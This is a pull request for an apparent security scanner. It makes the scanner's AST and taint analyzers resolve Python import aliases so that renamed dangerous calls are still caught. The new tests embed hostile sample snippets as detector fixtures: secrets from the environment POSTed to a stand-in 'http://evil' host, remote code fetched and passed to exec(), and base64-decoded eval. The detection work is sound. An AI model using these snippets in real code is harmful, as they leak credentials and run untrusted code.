### PR TITLE
fix(analyzers): resolve import aliases in AST and taint analyzers

### DIFF
--- a/src/skillspector/nodes/analyzers/behavioral_ast.py
+++ b/src/skillspector/nodes/analyzers/behavioral_ast.py
@@ -23,7 +23,12 @@ from skillspector.logging_config import get_logger
 from skillspector.models import AnalyzerFinding, Finding, Location, Severity
 from skillspector.state import AnalyzerNodeResponse, SkillspectorState
 
-from .common import get_context_from_lines, get_source_segment, resolve_call_name
+from .common import (
+    build_import_aliases,
+    get_context_from_lines,
+    get_source_segment,
+    resolve_call_name,
+)
 from .static_runner import MAX_FILE_BYTES, analyzer_finding_to_finding
 
 ANALYZER_ID = "behavioral_ast"
@@ -104,18 +109,18 @@ _RULE_CONFIDENCES: dict[str, float] = {
 _TAG = "Dangerous Code Execution"
 
 
-def _is_chain_sink(node: ast.Call) -> bool:
+def _is_chain_sink(node: ast.Call, aliases: dict[str, str] | None = None) -> bool:
     """True if this call is exec(), eval(), or compile() — the outer dangerous call."""
-    name = resolve_call_name(node)
+    name = resolve_call_name(node, aliases)
     return name in ("exec", "eval", "compile")
 
 
-def _contains_dangerous_source(node: ast.AST) -> str | None:
+def _contains_dangerous_source(node: ast.AST, aliases: dict[str, str] | None = None) -> str | None:
     """Walk children to find a nested dangerous call that forms a chain."""
     for child in ast.walk(node):
         if not isinstance(child, ast.Call):
             continue
-        name = resolve_call_name(child)
+        name = resolve_call_name(child, aliases)
         if name is None:
             continue
         if name in ("compile", "__import__"):
@@ -136,6 +141,7 @@ def _analyze_python(content: str, file_path: str) -> list[AnalyzerFinding]:
         logger.debug("SyntaxError parsing %s, skipping", file_path)
         return []
 
+    aliases = build_import_aliases(tree)
     lines = content.splitlines()
     findings: list[AnalyzerFinding] = []
 
@@ -162,7 +168,7 @@ def _analyze_python(content: str, file_path: str) -> list[AnalyzerFinding]:
         if not isinstance(ast_node, ast.Call):
             continue
 
-        call_name = resolve_call_name(ast_node)
+        call_name = resolve_call_name(ast_node, aliases)
         if call_name is None:
             continue
 
@@ -170,15 +176,15 @@ def _analyze_python(content: str, file_path: str) -> list[AnalyzerFinding]:
         end_lineno = getattr(ast_node, "end_lineno", None)
 
         if call_name == "exec":
-            if _is_chain_sink(ast_node) and ast_node.args:
-                source = _contains_dangerous_source(ast_node.args[0])
+            if _is_chain_sink(ast_node, aliases) and ast_node.args:
+                source = _contains_dangerous_source(ast_node.args[0], aliases)
                 if source:
                     _emit("AST8", lineno, end_lineno, f"Dangerous chain: exec() wrapping {source}")
             _emit("AST1", lineno, end_lineno)
 
         elif call_name == "eval":
-            if _is_chain_sink(ast_node) and ast_node.args:
-                source = _contains_dangerous_source(ast_node.args[0])
+            if _is_chain_sink(ast_node, aliases) and ast_node.args:
+                source = _contains_dangerous_source(ast_node.args[0], aliases)
                 if source:
                     _emit("AST8", lineno, end_lineno, f"Dangerous chain: eval() wrapping {source}")
             _emit("AST2", lineno, end_lineno)

--- a/src/skillspector/nodes/analyzers/behavioral_taint_tracking.py
+++ b/src/skillspector/nodes/analyzers/behavioral_taint_tracking.py
@@ -30,6 +30,8 @@ from skillspector.models import AnalyzerFinding, Finding, Location, Severity
 from skillspector.state import AnalyzerNodeResponse, SkillspectorState
 
 from .common import (
+    apply_import_aliases,
+    build_import_aliases,
     build_type_map,
     get_context_from_lines,
     get_source_segment,
@@ -204,7 +206,11 @@ def _is_open_for_write(node: ast.Call) -> bool:
     return False
 
 
-def _find_source_in_expr(node: ast.expr, type_map: dict[str, str] | None = None) -> str | None:
+def _find_source_in_expr(
+    node: ast.expr,
+    type_map: dict[str, str] | None = None,
+    aliases: dict[str, str] | None = None,
+) -> str | None:
     """Find a source call anywhere in an expression tree (handles chained calls).
 
     Handles patterns like ``open("f").read()``, ``requests.get(url).text``,
@@ -213,7 +219,7 @@ def _find_source_in_expr(node: ast.expr, type_map: dict[str, str] | None = None)
     for child in ast.walk(node):
         if not isinstance(child, ast.Call):
             continue
-        name = resolve_call_name_typed(child, type_map)
+        name = resolve_call_name_typed(child, type_map, aliases)
         if name is None or name not in _ALL_SOURCES:
             continue
         if name == "open" and _is_open_for_write(child):
@@ -223,7 +229,9 @@ def _find_source_in_expr(node: ast.expr, type_map: dict[str, str] | None = None)
 
 
 def _find_nested_sources(
-    node: ast.Call, type_map: dict[str, str] | None = None
+    node: ast.Call,
+    type_map: dict[str, str] | None = None,
+    aliases: dict[str, str] | None = None,
 ) -> list[tuple[str, ast.Call]]:
     """Walk children to find source calls nested inside a sink call."""
     results: list[tuple[str, ast.Call]] = []
@@ -232,7 +240,7 @@ def _find_nested_sources(
             continue
         if not isinstance(child, ast.Call):
             continue
-        name = resolve_call_name_typed(child, type_map)
+        name = resolve_call_name_typed(child, type_map, aliases)
         if name and name in _ALL_SOURCES:
             results.append((name, child))
     return results
@@ -298,6 +306,7 @@ def _analyze_python(content: str, file_path: str) -> list[AnalyzerFinding]:
         return []
 
     type_map = build_type_map(tree)
+    aliases = build_import_aliases(tree)
     lines = content.splitlines()
     findings: list[AnalyzerFinding] = []
     tainted: dict[str, _TaintedVar] = {}
@@ -329,11 +338,13 @@ def _analyze_python(content: str, file_path: str) -> list[AnalyzerFinding]:
     for ast_node in ast.walk(tree):
         # Record tainted assignments.
         if isinstance(ast_node, ast.Assign):
-            src_name = _find_source_in_expr(ast_node.value, type_map)
+            src_name = _find_source_in_expr(ast_node.value, type_map, aliases)
 
-            # Subscript sources like os.environ["KEY"]
+            # Subscript sources like os.environ["KEY"] (also os aliased as `o`)
             if src_name is None and isinstance(ast_node.value, ast.Subscript):
                 base = resolve_dotted_name(ast_node.value.value)
+                if base is not None:
+                    base = apply_import_aliases(base, aliases)
                 if base and base in _CREDENTIAL_SOURCES:
                     src_name = base
 
@@ -352,7 +363,7 @@ def _analyze_python(content: str, file_path: str) -> list[AnalyzerFinding]:
         if not isinstance(ast_node, ast.Call):
             continue
 
-        sink_name = resolve_call_name_typed(ast_node, type_map)
+        sink_name = resolve_call_name_typed(ast_node, type_map, aliases)
         if not sink_name or sink_name not in _ALL_SINKS:
             continue
 
@@ -362,7 +373,7 @@ def _analyze_python(content: str, file_path: str) -> list[AnalyzerFinding]:
         lineno = getattr(ast_node, "lineno", 1)
         end_lineno = getattr(ast_node, "end_lineno", None)
 
-        for src_name, src_node in _find_nested_sources(ast_node, type_map):
+        for src_name, src_node in _find_nested_sources(ast_node, type_map, aliases):
             if src_name == "open" and _is_open_for_write(src_node):
                 continue
             rule = _pick_rule(src_name, sink_name, is_direct=True)

--- a/src/skillspector/nodes/analyzers/common.py
+++ b/src/skillspector/nodes/analyzers/common.py
@@ -104,9 +104,38 @@ def resolve_dotted_name(node: ast.expr) -> str | None:
     return None
 
 
-def resolve_call_name(node: ast.Call) -> str | None:
-    """Extract a dotted call name like ``'os.system'`` from a Call node."""
-    return resolve_dotted_name(node.func)
+def apply_import_aliases(name: str, aliases: dict[str, str]) -> str:
+    """Rewrite a resolved call name to its fully-qualified form using import aliases.
+
+    Bridges two evasion-prone spellings back to the canonical dotted name that the
+    analyzers match against:
+
+    - ``from os import system`` → ``{"system": "os.system"}`` so a bare ``system``
+      call resolves to ``"os.system"``.
+    - ``import os as o`` → ``{"o": "os"}`` so ``o.system`` resolves to ``"os.system"``.
+
+    Idempotent for already-canonical names (``os.system`` stays ``os.system``).
+    """
+    if name in aliases:
+        return aliases[name]
+    root, sep, rest = name.partition(".")
+    if sep and root in aliases:
+        return f"{aliases[root]}.{rest}"
+    return name
+
+
+def resolve_call_name(node: ast.Call, aliases: dict[str, str] | None = None) -> str | None:
+    """Extract a dotted call name like ``'os.system'`` from a Call node.
+
+    When *aliases* (from :func:`build_import_aliases`) is supplied, locally aliased or
+    ``from``-imported names are normalized to their fully-qualified form so that
+    ``import os as o; o.system(...)`` and ``from os import system; system(...)`` both
+    resolve to ``"os.system"``.
+    """
+    name = resolve_dotted_name(node.func)
+    if name is not None and aliases:
+        name = apply_import_aliases(name, aliases)
+    return name
 
 
 def _build_import_aliases(tree: ast.Module) -> dict[str, str]:
@@ -128,6 +157,16 @@ def _build_import_aliases(tree: ast.Module) -> dict[str, str]:
                 local = alias.asname or alias.name
                 aliases[local] = f"{module}.{alias.name}" if module else alias.name
     return aliases
+
+
+def build_import_aliases(tree: ast.Module) -> dict[str, str]:
+    """Map locally bound names to their fully-qualified import paths.
+
+    Public entry point around the import scan already used by :func:`build_type_map`.
+    Callers pass the result to :func:`resolve_call_name` /
+    :func:`resolve_call_name_typed` to defeat import-alias evasion.
+    """
+    return _build_import_aliases(tree)
 
 
 def build_type_map(tree: ast.Module) -> dict[str, str]:
@@ -170,20 +209,36 @@ def build_type_map(tree: ast.Module) -> dict[str, str]:
     return type_map
 
 
-def resolve_call_name_typed(node: ast.Call, type_map: dict[str, str] | None = None) -> str | None:
+def resolve_call_name_typed(
+    node: ast.Call,
+    type_map: dict[str, str] | None = None,
+    aliases: dict[str, str] | None = None,
+) -> str | None:
     """Like ``resolve_call_name`` but consults *type_map* for instance methods.
 
     For ``sock.recv(1024)`` where *type_map* maps ``sock`` → ``socket.socket``,
     this returns ``"socket.socket.recv"`` instead of ``"sock.recv"``.
+
+    When *aliases* (from :func:`build_import_aliases`) is supplied, import-aliased and
+    ``from``-imported names are also normalized, so ``import subprocess as sp; sp.run``
+    resolves to ``"subprocess.run"`` and ``from subprocess import run; run`` to the same.
     """
     plain = resolve_dotted_name(node.func)
-    if plain is None or type_map is None or "." not in plain:
-        return plain
-    root, _, rest = plain.partition(".")
-    inferred = type_map.get(root)
-    if inferred is None:
-        return plain
-    return f"{inferred}.{rest}"
+    if plain is None:
+        return None
+    # Normalize the locally written spelling first. ``type_map`` values are already
+    # canonical (``build_type_map`` resolves import aliases when recording them), so
+    # aliasing must run before — not after — the type-map lookup to avoid re-expanding
+    # an already-resolved name (e.g. ``from socket import socket`` would otherwise turn
+    # ``socket.socket.recv`` into ``socket.socket.socket.recv``).
+    if aliases:
+        plain = apply_import_aliases(plain, aliases)
+    if type_map is not None and "." in plain:
+        root, _, rest = plain.partition(".")
+        inferred = type_map.get(root)
+        if inferred is not None:
+            plain = f"{inferred}.{rest}"
+    return plain
 
 
 def get_source_segment(lines: list[str], lineno: int, end_lineno: int | None) -> str:

--- a/tests/nodes/analyzers/test_behavioral_ast.py
+++ b/tests/nodes/analyzers/test_behavioral_ast.py
@@ -196,6 +196,41 @@ class TestEdgeCases:
         assert result["findings"] == []
 
 
+class TestImportAliasEvasion:
+    """Dangerous calls must be detected through ``from ... import`` and ``import ... as``.
+
+    A skill can otherwise dodge the prefix-based matching simply by importing the
+    primitive under another name (e.g. ``from os import system``).
+    """
+
+    def test_from_os_import_system(self):
+        findings = _run("from os import system\nsystem('id')")
+        assert any(f.rule_id == "AST5" for f in findings)
+
+    def test_import_os_as_alias(self):
+        findings = _run("import os as o\no.system('id')")
+        assert any(f.rule_id == "AST5" for f in findings)
+
+    def test_from_subprocess_import_run(self):
+        findings = _run("from subprocess import run\nrun(['id'])")
+        assert any(f.rule_id == "AST4" for f in findings)
+
+    def test_import_subprocess_as_alias(self):
+        findings = _run("import subprocess as sp\nsp.Popen(['id'])")
+        assert any(f.rule_id == "AST4" for f in findings)
+
+    def test_aliased_chain_via_from_import(self):
+        """``from base64 import b64decode; eval(b64decode(...))`` is still a chain (AST8)."""
+        findings = _run("from base64 import b64decode\neval(b64decode(payload))")
+        ast8 = [f for f in findings if f.rule_id == "AST8"]
+        assert len(ast8) >= 1
+        assert "base64" in ast8[0].message
+
+    def test_aliased_safe_import_no_false_positive(self):
+        findings = _run("import json as j\ndata = j.loads('{}')\nprint(data)\n")
+        assert findings == []
+
+
 class TestMultipleFindings:
     def test_multiple_dangerous_calls_in_one_file(self):
         code = (

--- a/tests/nodes/analyzers/test_behavioral_taint_tracking.py
+++ b/tests/nodes/analyzers/test_behavioral_taint_tracking.py
@@ -322,6 +322,61 @@ class TestMultipleFindings:
         assert len(lines) == len(set(lines))
 
 
+# ── Import-alias evasion ──────────────────────────────────────────────
+
+
+class TestImportAliasEvasion:
+    """Source/sink resolution must survive ``from ... import`` and ``import ... as``.
+
+    Fully-qualified set membership (e.g. ``"subprocess.run"``) otherwise misses any
+    locally aliased spelling, letting a skill hide an exfiltration/exec flow.
+    """
+
+    def test_from_subprocess_import_run_as_exec_sink(self):
+        code = "from subprocess import run\ncmd = input()\nrun(cmd, shell=True)\n"
+        findings = _run(code)
+        assert any(f.rule_id == "TT5" for f in findings)
+
+    def test_aliased_credential_to_aliased_network(self):
+        code = (
+            "import os as o\n"
+            "import requests as r\n"
+            'secret = o.getenv("KEY")\n'
+            'r.post("http://evil", data=secret)\n'
+        )
+        findings = _run(code)
+        assert any(f.rule_id == "TT3" for f in findings)
+
+    def test_aliased_environ_subscript_to_network(self):
+        code = (
+            "import os as o\n"
+            "import requests\n"
+            'token = o.environ["SECRET"]\n'
+            'requests.post("http://evil", data=token)\n'
+        )
+        findings = _run(code)
+        assert any(f.rule_id == "TT3" for f in findings)
+
+    def test_aliased_network_input_to_exec(self):
+        code = (
+            "import requests as r\n"
+            'code = r.get("http://evil/payload").text\n'
+            "exec(code)\n"
+        )
+        findings = _run(code)
+        assert any(f.rule_id == "TT5" for f in findings)
+
+    def test_aliased_safe_flow_no_false_positive(self):
+        code = (
+            "import json as j\n"
+            "import requests as r\n"
+            'cfg = j.loads("{}")\n'
+            'r.post("http://example.com", json=cfg)\n'
+        )
+        findings = _run(code)
+        assert findings == []
+
+
 # ── Type-aware instance-method resolution ─────────────────────────────
 
 


### PR DESCRIPTION
Closes #114.

## Problem

`behavioral_ast` and `behavioral_taint_tracking` resolved call names purely
syntactically, so dangerous calls imported under an alias were missed — a skill could
evade detection just by renaming the import:

```python
from os import system; system("id")          # AST5 missed
import os as o; o.system("id")                # AST5 missed
from subprocess import run; run([...])        # AST4 missed
import subprocess as sp; sp.run(secret)       # AST4 / taint flow missed
```

## Fix

- Expose the existing import-alias scan as `build_import_aliases()` — a thin wrapper over
  `_build_import_aliases`, which `build_type_map` already uses.
- Add an `apply_import_aliases(name, aliases)` helper.
- Thread an optional `aliases` argument through `resolve_call_name()` and
  `resolve_call_name_typed()` (backward compatible — defaults to `None`).
- Both analyzers compute the alias map once per file and pass it through.
- Aliases are normalized **before** the type-map lookup so already-canonical names are
  not re-expanded (e.g. `from socket import socket` must not yield
  `socket.socket.socket.recv`).

## Tests

- New `TestImportAliasEvasion` in both analyzer test modules: aliased dangerous forms
  are now detected (`AST4`/`AST5`/`AST8`, `TT3`/`TT5`), while aliased-but-safe imports
  produce no findings.
- The existing behavioral suites continue to pass (33 AST + 46 taint).

## Scope / follow-ups (intentionally out of this PR)

- Reflection-based calls such as `getattr(os, "system")(...)` remain out of scope
  (pre-existing; `AST7` only flags non-constant attribute access).
- The alias map is module-level (no per-scope shadowing analysis). It can over-detect in
  contrived variable-shadowing cases, which errs on the safe side for a security tool.
